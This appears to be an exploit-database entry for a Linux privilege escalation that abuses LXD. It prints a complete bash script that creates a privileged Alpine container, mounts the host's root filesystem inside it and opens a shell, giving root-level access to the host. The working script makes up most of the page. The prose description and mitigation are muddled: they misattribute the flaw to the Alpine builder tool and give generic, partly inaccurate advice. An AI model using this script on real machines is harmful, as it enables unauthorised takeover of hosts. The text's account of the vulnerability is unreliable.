LXD Alpine Builder Privilege Escalation

vendor:

LXD Alpine Builder

by:

Marcelo Vazquez and Victor Lasa

8.8

CVSS

HIGH

Privilege Escalation

269

CWE

Product Name: LXD Alpine Builder

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

LXD Alpine Builder Privilege Escalation

This exploit is a privilege escalation vulnerability in LXD Alpine Builder. It allows an attacker to gain root access to the victim machine by running a malicious script. The attacker first downloads the build-alpine script from the GitHub repository and runs it as root user. Then, the attacker creates a container using the malicious script and adds a device to the container with the source set to the root directory of the victim machine. Finally, the attacker executes the script and gains root access to the victim machine.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the root directory of the victim machine. Additionally, users should ensure that they are running the latest version of LXD Alpine Builder and that all security patches are applied.

Source

Exploit-DB raw data:

#!/usr/bin/env bash

# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#	   Victor Lasa      (vowkin)
# ----------------------------------

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi